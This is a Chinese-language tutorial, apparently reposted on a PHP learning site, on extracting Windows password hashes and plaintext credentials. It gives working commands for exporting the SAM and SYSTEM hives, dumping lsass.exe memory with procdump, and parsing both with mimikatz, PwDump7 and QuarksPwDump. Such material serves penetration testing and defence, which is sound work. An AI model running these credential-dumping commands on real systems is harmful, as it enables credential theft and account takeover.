0

0

Windows - Hash散列值抓取方法

蓮花仙者

蓮花仙者

发布时间:2025-08-24 08:22:01

|

411人浏览过

|

来源于php中文网

原创

lm hash 和 ntlm hash

Windows 操作系统通常使用两种方法对用户的明文密码进行加密处理。

在域环境中,用户信息存储在 ntds.dit 中,加密后为散列值。

在 Windows 操作系统中,Hash 的结构通常如下:

代码语言:javascript代码运行次数:0运行复制
username:RID:LM-HASH:NT-HASH

LM Hash(LAN Manager Hash)其本质是 DES 加密。在 Windows 2008 及开始之后默认禁用的是 LM Hash。

NTLM Hash 是基于 MD4 加密算法进行加密的,服务器从 Windows Server 2003 以后,Windows 操作系统的认证方式均为 NTLM Hash。

Windows Hash 散列值抓取

‍‍‍‍‍要想在 Windows 操作系统中抓取散列值或明文密码,必须将权限提升为 System。本地用户名,散列值和其他安全验证信息都保存在 SAM 文件中。

lsass.exe 进程用于实现 Windows 的安全策略(本地安全策略和登录策略)。可以使用工具将散列值和明文密码从内存中的 lsass.exe 进程或 SAM 文件中导出。‍‍‍‍‍


GetPassword


在命令行运行 Getpassword 即可获取明文密码

Windows - Hash散列值抓取方法

PwDump7

在命令行环境中运行 PwDump7 程序,可以得到系统中所有账户的 NTLM Hsh:(必须要有系统权限才能运行)

下载地址:https://download.openwall.net/pub/projects/john/contrib/pwdump/pwdump7.zip

Windows - Hash散列值抓取方法

QuarkPwDump

在命令行下输入:导出三个用户的 NTML Hash

代码语言:javascript代码运行次数:0运行复制
QuarksPwDump.exe --dump-hash-local
Windows - Hash散列值抓取方法

QuarksPwDump 不过杀软。


通过 SAM 和 System 文件抓取密码

(1)导出 SAM 和 System 文件:通过 reg 的注册表导出

代码语言:javascript代码运行次数:0运行复制
reg save hklm\sam sam.hivereg save hklm\system system.hive
Windows - Hash散列值抓取方法

(2)通过读取 SAM 和System 文件获得 NTLM Hash

英特尔AI工具
英特尔AI工具

英特尔AI与机器学习解决方案

下载

1、使用mimikatz读取SAM和System文件

将导出的 system.hive 和 sam.hive 文件放到 mimikatz 文件夹下,然后运行mimikatz命令:

代码语言:javascript代码运行次数:0运行复制
lsadump::sam /sam:sam.hive /system:system.hive
Windows - Hash散列值抓取方法

2、使用mimikatz直接读取本地 SAM文件,导出Hash信息

该方法与1不同的是,需要在目标机器上运行mimikatz:

代码语言:javascript代码运行次数:0运行复制
#提升权限privilege::debug#提升权限为systemtoken::elevate#读取本地SAM文件,获得NTLM Hashlsadump::sam
Windows - Hash散列值抓取方法

使用 Mimikatz 在线读取 SAM 文件

在目标mimikatz目录下运行命令,在线读取散列值及明文密码:

代码语言:javascript代码运行次数:0运行复制
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
Windows - Hash散列值抓取方法

使用 Mimikatz 离线读取 lsass.dmp 文件

(1)导出lsass.dmp文件

通过 procdump.exe 文件导出lsass.dmp文件

procdump 下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

在命令行输入命令会生成一个 lsass.dmp 文件:

代码语言:javascript代码运行次数:0运行复制
procdump.exe -accepteula -ma lsass.exe lsass.dmp
Windows - Hash散列值抓取方法

(2)使用mimikatz导出lsass.dmp文件中的密码散列值

首先将导出的lsass.dmp文件放到mimikatz的目录下,然后输入命令:

如果有 Switch to MINIDUMP 说明加载成功

代码语言:javascript代码运行次数:0运行复制
sekurlsa::minidump lsass.dmp
Windows - Hash散列值抓取方法

最后运行命令导出密码散列值:

代码语言:javascript代码运行次数:0运行复制
sekurlsa::logonPasswords full
Windows - Hash散列值抓取方法

参考文章:

https://zhuanlan.zhihu.com/p/220277028

热门AI工具

更多
DeepSeek
DeepSeek

幻方量化公司旗下的开源大模型平台

豆包大模型
豆包大模型

字节跳动自主研发的一系列大型语言模型

通义千问
通义千问

阿里巴巴推出的全能AI助手

腾讯元宝
腾讯元宝

腾讯混元平台推出的AI助手

文心一言
文心一言

文心一言是百度开发的AI聊天机器人,通过对话可以生成各种形式的内容。

讯飞写作
讯飞写作

基于讯飞星火大模型的AI写作工具,可以快速生成新闻稿件、品宣文案、工作总结、心得体会等各种文文稿

即梦AI
即梦AI

一站式AI创作平台,免费AI图片和视频生成。

ChatGPT
ChatGPT

最最强大的AI聊天机器人程序,ChatGPT不单是聊天机器人,还能进行撰写邮件、视频脚本、文案、翻译、代码等任务。

相关专题

更多
switch语句用法
switch语句用法

switch语句用法:1、Switch语句只能用于整数类型,枚举类型和String类型,不能用于浮点数类型和布尔类型;2、每个case语句后面必须跟着一个break语句,以防止执行其他case的代码块,没有break语句,将会继续执行下一个case的代码块;3、可以在一个case语句中匹配多个值,使用逗号分隔;4、Switch语句中的default代码块是可选的等等。

541

2023.09.21

Java switch的用法
Java switch的用法

Java中的switch语句用于根据不同的条件执行不同的代码块。想了解更多switch的相关内容,可以阅读本专题下面的文章。

423

2024.03.13

windows查看端口占用情况
windows查看端口占用情况

Windows端口可以认为是计算机与外界通讯交流的出入口。逻辑意义上的端口一般是指TCP/IP协议中的端口,端口号的范围从0到65535,比如用于浏览网页服务的80端口,用于FTP服务的21端口等等。怎么查看windows端口占用情况呢?php中文网给大家带来了相关的教程以及文章,欢迎大家前来阅读学习。

810

2023.07.26

查看端口占用情况windows
查看端口占用情况windows

端口占用是指与端口关联的软件占用端口而使得其他应用程序无法使用这些端口,端口占用问题是计算机系统编程领域的一个常见问题,端口占用的根本原因可能是操作系统的一些错误,服务器也可能会出现端口占用问题。php中文网给大家带来了相关的教程以及文章,欢迎大家前来学习阅读。

1129

2023.07.27

windows照片无法显示
windows照片无法显示

当我们尝试打开一张图片时,可能会出现一个错误提示,提示说"Windows照片查看器无法显示此图片,因为计算机上的可用内存不足",本专题为大家提供windows照片无法显示相关的文章,帮助大家解决该问题。

804

2023.08.01

windows查看端口被占用的情况
windows查看端口被占用的情况

windows查看端口被占用的情况的方法:1、使用Windows自带的资源监视器;2、使用命令提示符查看端口信息;3、使用任务管理器查看占用端口的进程。本专题为大家提供windows查看端口被占用的情况的相关的文章、下载、课程内容,供大家免费下载体验。

454

2023.08.02

windows无法访问共享电脑
windows无法访问共享电脑

在现代社会中,共享电脑是办公室和家庭的重要组成部分。然而,有时我们可能会遇到Windows无法访问共享电脑的问题。这个问题可能会导致数据无法共享,影响工作和生活的正常进行。php中文网给大家带来了相关的教程以及文章,欢迎大家前来阅读学习。

2355

2023.08.08

windows自动更新
windows自动更新

Windows操作系统的自动更新功能可以确保系统及时获取最新的补丁和安全更新,以提高系统的稳定性和安全性。然而,有时候我们可能希望暂时或永久地关闭Windows的自动更新功能。php中文网给大家带来了相关的教程以及文章,欢迎大家前来学习阅读。

823

2023.08.10

C++ 设计模式与软件架构
C++ 设计模式与软件架构

本专题深入讲解 C++ 中的常见设计模式与架构优化,包括单例模式、工厂模式、观察者模式、策略模式、命令模式等,结合实际案例展示如何在 C++ 项目中应用这些模式提升代码可维护性与扩展性。通过案例分析,帮助开发者掌握 如何运用设计模式构建高质量的软件架构,提升系统的灵活性与可扩展性。

14

2026.01.30

热门下载

更多
网站特效
/
网站源码
/
网站素材
/
前端模板

精品课程

更多
相关推荐
/
热门推荐
/
最新课程
PostgreSQL 教程
PostgreSQL 教程

共48课时 | 8.1万人学习

Excel 教程
Excel 教程

共162课时 | 14.5万人学习

PHP基础入门课程
PHP基础入门课程

共33课时 | 2万人学习

关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送

Copyright 2014-2026 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号